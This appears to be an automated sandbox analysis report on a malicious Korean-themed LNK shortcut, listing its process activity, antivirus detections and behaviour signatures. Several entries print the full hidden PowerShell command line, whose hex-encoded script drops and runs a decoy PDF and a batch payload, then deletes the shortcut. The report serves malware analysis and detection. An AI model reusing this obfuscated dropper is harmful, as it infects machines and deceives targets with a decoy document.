NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02212000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02225000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05080000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02213000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02214000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02215000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02216000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02217000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02218000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02219000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05131000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05132000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05133000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05134000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05135000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05138000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05139000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0513f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05140000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05141000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05144000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\KOREAN~1.LNK

Creates a suspicious process (3 events)

cmdline	C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
cmdline	C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline	"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 13, 2023, 2:01 p.m.	thread_identifier: 2756 thread_handle: 0x00000334 process_identifier: 2752 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));" filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000033c	1	1	0
CreateProcessInternalW Sept. 13, 2023, 2:02 p.m.	thread_identifier: 2896 thread_handle: 0x00000094 process_identifier: 2892 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));" filepath_r: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

Avast	LNK:Agent-HN [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Powecod.d
Sophos	Troj/LnkObf-AH
ZoneAlarm	HEUR:Trojan.WinLNK.Powecod.d
Google	Detected
VBA32	Trojan.Link.Crafted
Rising	Trojan.PSRunner/LNK!1.BADE (CLASSIC)
SentinelOne	Static AI - Suspicious LNK
AVG	LNK:Agent-HN [Trj]

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 13, 2023, 2:02 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od

cmdline

"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2616 resumed a thread in remote process 2752
NtResumeThread Sept. 13, 2023, 2:01 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2752	1	0	0

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-windowstyle hidden				value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

KOREAN~1.LNK

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All